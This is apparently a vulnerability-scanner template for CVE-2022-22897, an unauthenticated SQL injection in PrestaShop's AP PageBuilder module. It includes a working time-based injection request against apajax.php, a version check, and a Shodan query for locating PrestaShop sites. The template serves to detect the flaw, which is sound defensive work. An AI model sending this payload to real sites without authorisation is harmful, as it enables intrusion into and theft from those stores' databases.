62 lines
2.3 KiB
YAML
62 lines
2.3 KiB
YAML
id: CVE-2022-22897
|
|
|
|
info:
|
|
name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection
|
|
author: mastercho
|
|
severity: critical
|
|
description: |
|
|
A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
|
|
remediation: |
|
|
Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-22897
|
|
- https://packetstormsecurity.com/files/cve/CVE-2022-22897
|
|
- https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-22897
|
|
cwe-id: CWE-89
|
|
epss-score: 0.04685
|
|
epss-percentile: 0.91794
|
|
cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: apollotheme
|
|
product: ap_pagebuilder
|
|
framework: prestashop
|
|
shodan-query: http.component:"Prestashop"
|
|
tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: {{RootURL}}
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)
|
|
- |
|
|
GET /modules/appagebuilder/config.xml HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: version
|
|
part: body_2
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration_1>=6'
|
|
- 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")'
|
|
condition: and
|
|
# digest: 4b0a004830460221009205104f5c3eb4f63822106b447797e39628c59c9283086dc6a3e1faa3ddaecc022100f44bb37aa2745c49bb26f004ee35c640664987111347ea7cbcb0f8ebbe94d780:922c64590222798bb761d5b6d8e72950 |